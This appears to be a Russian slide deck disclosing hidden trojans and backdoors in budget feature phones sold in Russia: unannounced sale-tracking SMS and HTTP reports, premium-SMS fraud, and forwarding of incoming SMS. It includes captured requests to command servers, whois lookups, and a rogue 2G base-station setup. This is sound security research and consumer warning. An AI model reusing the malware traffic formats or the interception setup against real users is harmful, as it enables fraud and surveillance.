ТРОЯНЫ И БЭКДОРЫ В КНОПОЧНЫХ МОБИЛЬНЫХ ТЕЛЕФОНАХ РОССИЙСКОЙ РОЗНИЦЫ - ValdikSS & Co.

ТРОЯНЫ И БЭКДОРЫ В
КНОПОЧНЫХ МОБИЛЬНЫХ
ТЕЛЕФОНАХ РОССИЙСКОЙ
РОЗНИЦЫ
ValdikSS & Co.

МОТИВАЦИЯ
Можно ли заменить USB-модемы и GSM-
 модули телефонами для приёма СМС-
 сообщений?

 2

Анализ рынка. Какой телефон выбрать?

 3

Три кита мобильных SoC

RDA Microelectronics Spreadtrum Mediatek

• MIPS • ARM • ARM
• Только 2G • 2G/3G/4G • 2G/3G/4G
• Более не выпускаются, • Ребрендированы в
 но всё ещё продаются Unisoc, но продолжают
• Компания куплена выпускать чипы под
 Spreadtrum старым брендом

 4

Что я купил
Были куплены почти случайные
телефоны, ориентируясь по визуальному
виду интерфейса и немногочисленной
информации в интернете:
• Inoi 101 (RDA8826/SC6533, 600₽)
• DEXP SD2810 (SC6531E, 699₽)
• Itel it2160 (MT6261, 799₽)
• Irbis SF63 (SC6531DA, 750₽)
• F+ Flip 3 (SC6531DA, 1499₽)

 5

Что я получил

 6

Классификация нежелательных функций

• Отправка СМС и выход в интернет для «отслеживания
 продаж»
• Троян, отправляющий СМС на платные (короткие) номера,
 предварительно загрузив текст и номер с сервера через
 интернет
• Бэкдор, перехватывающий входящие СМС-сообщения и
 отправляющий их на сервер

 7

Методы обнаружения и анализа

• Проверка детализации мобильного оператора
• Анализ прошивки телефона
• Использование собственной базовой станции GSM (2G)

 8

Проверка детализации моб. оператора
Как делать: достаточно не пользоваться телефоном сутки, после чего
запросить детализацию в виде файла через онлайн-кабинет
мобильного оператора.
Что получаем: факт выхода в интернет (без адреса и содержимого),
факт отправки СМС-сообщения и номер получателя, точное время
совершенных действий.
Результат: помогает легко понять, содержится ли в телефоне
нежелательная функциональность, без подробностей.

 9

Анализ прошивки телефона

Как делать:
 1. Получаем дамп или скачиваем прошивку в интернете
 2. Распаковываем при необходимости
 3. Исследуем код прошивки вручную

Mediatek: доступен распаковщик, легко сделать дамп прошивки
RDA: запакована частично, дамп снимается скриптом или спец. ПО
Spreadtrum: распаковщик отсутствует, проблемы с дампом прошивки

 10

Анализ прошивки телефона

Что получаем: весь программный код прошивки

Результат: детальное понимание нежелательной/вредоносной
функциональности, степень её опасности, с возможностью дальнейшего
отключения.

 11

Получение
 прошивки
Так называемые «боксы» —
аппаратно-программные
комплексы для прошивки и
восстановления от сторонних
разработчиков.
• Miracle Thunder
• Infinity CM2

 12

Способы распаковки прошивки

Mediatek: основная часть прошивки (раздел ALICE) запакована кодами
Хаффмана. Существует распаковщик unalice, разжимающий файл:
https://github.com/donnm/mtk_fw_tools/

Spreadtrum: основная часть прошивки сжата модифицированным
LZMA, распаковщик отсутствует в публичном доступе.

RDA: некоторые части прошивки сжаты LZMA, можно сдампить из RAM:
https://habr.com/ru/post/558780/

 13

Базовая станция 2G
Необходимое оборудование: Software Defined Radio (SDR) и
компьютер с бесплатным открытым ПО

Что получаем: доступ ко всему сетевому трафику GSM/GPRS, с
возможностью его просмотра и модификации на лету.

Результат: детальный массовый практический анализ
вредоносной активности без предварительной подготовки
каждого устройства.

 14

Базовая станция 2G

Моя конфигурация:
• bladeRF x115 ($650)
• Raspberry Pi 400 ($100)
• YateBTS + Wireshark

 15

Inoi 101

Российский OEM-поставщик.
 
Самый «чистый» телефон из
приобретенных:
• Не отправляет СМС автоматически
• Не выходит в интернет

 16

Itel it2160

Китайский производитель,
 ⚠
выпускающий устройства для
развивающихся стран.

• Сообщает «о продаже» через
 интернет, без предупреждения
• Имеет публичную базу
 «проданных» устройств

 17

POST /SaleStatistics/sendsale/sendSale?ua=itel-
 Itel it2160
it2160&screen=128X160&imsi=9250991625668426&imei=354648
020000251&phone_version=it2160-DL194-EnRuUk-RU-
20210201&platform=2&device=1&lang=Русский язык&timeStam
p=2021-01-
0102:00:00&auth=ed6bdd17212ec9c9699a6b0a693870fd
HTTP/1.1
Host: asv.transsion.com:8080
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
x-wap-profile:
http://nds.nokia.com/uaprof/N6280r100.xml
Content-Length: 0

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 31 May 2021 16:05:17 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 52
Connection: keep-alive

{"response":{"code":"201","desc":"Repeat Products"}}

 18

Itel it2160
• IMEI
• Страна
• Модель
• Версия прошивки
• Язык
• Время активации
• Идентификатор
 базовой станции
 (LAC/TAC)

http://asv.transsion.com:8080/openi
nfo/open/index

 19

F+ Flip 3

Российский OEM-поставщик.
 ⚠
• Сообщает «о продаже» через СМС
 на номер +79584971255
• Передаёт IMEI, IMSI
• Не содержит браузера, не выходит
 в интернет

 20

F+ Flip 3

 21

F+ Flip 3
 →
Разные номера
телефонов для
каждого
региона
(PLMN)

 Отправка СМС
 с IMEI и IMSI
 →
 22

F+ Flip 3

 23

F+ Flip 3
На 4pda была обнаружена
прошивка с отладочными
символами от нескольких моделей
фирмы BQ

gmb = gmobi?

 24

DEXP SD2810
 ☣
Российский бренд сети магазинов
DNS.

• Сообщает «о продаже» через
 интернет, без предупреждения
• Передаёт IMEI, IMSI
• Обращается к CnC в интернете и
 выполняет его команды
• Отправляет платные СМС на
 короткие номера с текстом,
 полученным с сервера
 25

DEXP SD2810
POST http://www.mgs123.com:8080/fee/mergserv HTTP/1.1 
Host: www.mgs123.com 
 GetFeeConfig
Accept: */*
User-Agent: MOT-E398/0E.20.34R MIB/2.2.1 Profile/MIDP- 2
2.0 Configuration/CLDC-1.0 UP.Link/5.1.2.6 6000
Content-Length: 177 -1
 1
BCMD=GetFeeConfig&CRTY=6&IMSI=250991625668426&RIMSI=25 null
 0
0991625668426&CTYPE=1&CVER=2001&NONCE=151927053004&PLM
N=25099&PMOD=8411&PNUM=&RTYPE=A&SIGN=7295DD12B0B11CF99
7AC8B4A593D82FA sms

 0

 1
 50.0
 45
 1
 171
 0
 20210815
 1

 26

DEXP SD2810
$ whois mgs123.com | grep Registrar
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://whois.aliyun.com
Registrar Registration Expiration Date: 2024-08-01T08:22:22Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Registrar Abuse Contact Phone: +86.95187

$ dig +short www.mgs123.com
121.201.57.203

$ whois 121.201.57.203 | grep descr
descr: Guangdong RuiJiang Science and Tech Ltd.
descr: Room 404 ,No.100, Lingnan Avenue North,
descr: Lingnan Building, Foshan, GuangDong,
descr: CNC Group CHINA169 Guangdong Province Network
descr: Addresses from CNNIC(HUANDAO)

 27

DEXP SD2810

 28

DEXP SD2810

02.01.2019, мы приобрели телефон Dexp SD2810 [...] в день
покупки мы вставили сим-карты и спустя 2 часа со счёта
произошло списание денежных в размере 50 рублей. По
детализации я увидел, что была отправка смс на номер 4446 и
заказан какой-то развлекательный контент [...]

 15.01.2019 и 02.02.2019 также были отправлены смс на этот же
 номер 4446 и списано по 50 р. за каждую.
 https://www.city-n.ru/view/421207.html

 29

Irbis SF63

Российский OEM-поставщик.
 ☣
• Сообщает «о продаже» через
 интернет, без предупреждения
• Передаёт зашифрованные данные
 на сервер
• Обращается к CnC в интернете и
 выполняет его команды

 30

Irbis SF63
GET HTTP/1.1 200
/checkupdate?p=hxB4ZvBrVc9Hl8wcdORsVcZHmHet Server: nginx/1.12.0
Yc9sSHwEhuvtWc5Hkf0EYcF0SHGolxF4VEdrXcFsWER Date: Sat, 19 Jun 2021 15:11:06 GMT
wWEhzW8RxSHGoifF4VudsXclvVc9rVuBzVuBySI6Nhg Content-Type: text/html;charset=UTF-8
Z4WEduVdZHlxV4WuFrVulrVc9sVc9HiHOvYc9HlxwuY Content-Length: 28
c9HmxOrYc9HlHeIYfONk7iwlyWFYcRHjgitYc9HmPsE Connection: keep-alive
Yc9HhHZ4Vc5oVc5oVE5sX75sWcJsWcJtVB%3D%3D Pragma: no-cache
HTTP/1.1 Expires: Thu, 01 Jan 1970 00:00:00 GMT
Accept: */* Cache-Control: no-cache
Accept-Language: zh-cn Cache-Control: no-store
Host: hwwap.well2266.com:8077 Cache-Control: must-revalidate
Connection: Keep-Alive
Cache-Control: no-cache hfWvjgiGiQa2VE5tVbvrWDvsXgv=
User-Agent: MAUI WAP Browser
Accept-Charset: utf8,gb2312

 31

Irbis SF63
$ whois well2266.com | grep Registrar
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://whois.aliyun.com
Registrar Registration Expiration Date: 2023-06-17T02:47:49Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Registrar Abuse Contact Phone: +86.95187

$ dig +short hwwap.well2266.com
47.88.242.46

$ whois 47.88.242.46 | grep Organization
Organization: Alibaba.com LLC (AL-3)

 32

Irbis SF63

Началось все 24 октября 2020 года. [...] телефон радостно
прислал мне уведомление, что новый контакт
зарегистрировался в телеграм. Сон как рукой сняло ибо в
телеграме зарегистрировалась бабушка моей девушки.
 https://tjournal.ru/stories/351729-babushkofon-voruyushchiy-sms-i-telegram-akkaunty

 33

Irbis SF63
Сегодня приходит сообщение в
телеграмме, что моя бабушка теперь в
Telegram!

Я сильно удивился, ведь бабушке уже
больше 80 лет, телефон кнопочный, без
доступа в интернет.

Позвонил ей, уточнил, говорит, что
недавно приходил смс-код от номера
Telegram.

https://pikabu.ru/story/kak_poluchit_dostup_k_sms_lyubogo_
 nomera_ili_bilayn_probivaet_dno_7468291

 34

Результаты

4 из 5 телефонов содержат незадекларированную функциональность,
из них:

• ⚠ 2 модели расходуют деньги со счёта (отправляют данные после
 покупки через СМС/интернет)
• ☣ 1 модель выходит в интернет и отправляет платные СМС-
 сообщения на короткие номера
• ☣ 1 модель пересылает входящие сообщения через интернет

 35

Кто виноват?
• Бренд
Не разрабатывает прошивку и не проверяет её на наличие
незадекларированных возможностей.
Как правило, не выкладывает прошивку на сайт, а отправляет в
сервисный центр.
Отрицает проблему или умалчивает о ней.

• OEM-производитель
Готов внедрить любой каприз бренда или производителя сторонних
модулей (за ваши деньги).

• Минцифры (бывший Минсвязи)
Проверяют только сертификацию продукции на соответствие мировым
и российским стандартам связи.

 36

Связь с производителями
• DEXP
 Запрос через веб-сайт остался без ответа.

• BQ
 Запрос через email: на вопросы не ответили, посоветовали
 обратиться в сервисный центр.

• F+
 Запрос через email с подтверждением получения через звонок в call-
 центр: ответили на часть вопросов, выпустили обновление
 прошивки, доступное только через сервисный центр.

 37

Диалог с компанией F+: запрос

Кнопочный телефон F+ Flip 3 в автоматическом режиме и незаметно
для пользователя отправляет СМС-сообщения на номер +79584971255
при установке в него российских SIM-карт, причём отправленное СМС-
сообщение не сохраняется в памяти телефона.
Сообщения содержат IMEI-номер устройства, IMSI-номер SIM-карты, и
три фиксированных значения.
…
Полный формат сообщения следующий:
#IMSI#IMEI#250124#64#1#
Где IMSI — IMSI-номер SIM-карты, IMEI — IMEI-номер телефона.

 38

Диалог с компанией F+: ответ

• С какой целью данная функциональность внедрена в устройства F+;
 • Нет информации.
• Почему о ней не заявляется на официальном сайте, коробке или
 инструкции устройства;
 • Потому что этот функционал внедрён не нашими инженерами.
• Как обрабатываются полученные данные;
 • Нет информации.
• Какому юридическому или физическому лицу принадлежит номер
 +79584971255.
 • Нет информации.

 39

Диалог с компанией F+: ответ

03.06.2021
Мы занимаемся решением данной проблемы. На новых ревизиях с
новой прошивкой такой проблемы нет. Однако новая прошивка
несовместима со старой ревизией телефонов. Как только в сервисе
появится новая прошивка для старых ревизий я Вам сообщу.

15.06.2021
В сервисный центр поступила прошивка SW06 в которой решена эта
проблема, обратитесь в ближайший сервисный центр из списка по
ссылке https://fplusmobile.ru/support/ для перепрошивки Вашего
телефона.

 40

Диалог с Минцифры
Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации [...]
рассмотрело Ваше обращение о производителе оборудования ООО «Ф-Плюс Мобайл» и сообщает
следующее.
Согласно Положению, Минцифры России осуществляет функции по выработке и
реализации государственной политики и нормативно-правовому регулированию в
сфере связи [...]
Информируем, что средства связи, указанные в Вашем первоначальном обращении, прошли
процедуру обязательного подтверждения соответствия Правилам применения
оборудования радиодоступа. [...]
Следует отметить, что в соответствии с Правилами при декларировании телефонных аппаратов для
сетей подвижной радиотелефонной связи проверка наличия или отсутствия отправки
коротких сообщений в автоматическом режиме не предусмотрена.
Федеральный государственный надзор в области защиты прав потребителей осуществляется
уполномоченным федеральным органом исполнительной власти – Федеральной службой по надзору
в сфере защиты прав потребителей и благополучия человека (Роспотребнадзор).

 41

Что делать?

Мобильных телефонов огромное количество, проверить их все
невозможно.
• Читайте отзывы перед покупкой
• Отслеживайте поведение нового телефона в течение суток по
 детализации оператора после покупки
• Пишите в Роспотребнадзор, ФСБ (?) и производителю, если
 обнаружили непонятную активность

 42

…а что с приёмом СМС?

Ни один из телефонов не предоставляет полноценный AT-порт через
USB или Bluetooth.

 43

SIM во главе всего

Не только телефон
может отправлять SMS,
но и SIM.

 44

Бонус
Самые странные
телефоны
Rezone A281 Force

• Огромный динамик
• Фонарик из 20 светодиодов
• Лазерная указка
• Выдвижная антенна FM
• Функция караоке
• 3 SIM-карты

 45

Самые странные
телефоны
Strike F10

Комментарий владельца:
Пожалуй, единственный телефон,
поднимая который, можно
говорить не «алло», а «у
аппарата».

Тоже отправляет СМС!
 ⚠
 46

49

50

51

52

53

54